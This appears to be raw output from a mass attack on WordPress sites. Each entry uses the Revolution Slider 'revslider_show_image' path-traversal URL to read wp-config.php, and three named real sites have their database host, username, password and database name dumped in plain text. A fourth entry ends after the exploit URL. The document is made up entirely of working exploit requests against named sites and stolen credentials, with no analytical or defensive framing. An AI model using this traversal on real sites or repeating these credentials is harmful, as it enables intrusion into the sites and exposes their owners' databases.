Full Config Path  : http://fortuna-les.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 Host:  localhost
 user:  ih229268_fortuna-les
 pass:  N8lrZP$IoyaT
 DB:    ih229268_fortuna-les
---------------------
Full Config Path  : http://www.avrh.qc.ca/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 Host:  127.0.0.1
 user:  avrhqc
 pass:  43p1xb8
 DB:    garl_avrh2
---------------------
Full Config Path  : http://www.rsbcbuild.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 Host:  10.168.1.47
 user:  rsbcbuil_wp
 pass:  bOmiX25p
 DB:    rsbcbuil_wp
---------------------
Full Config Path  : http://www.llardana.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
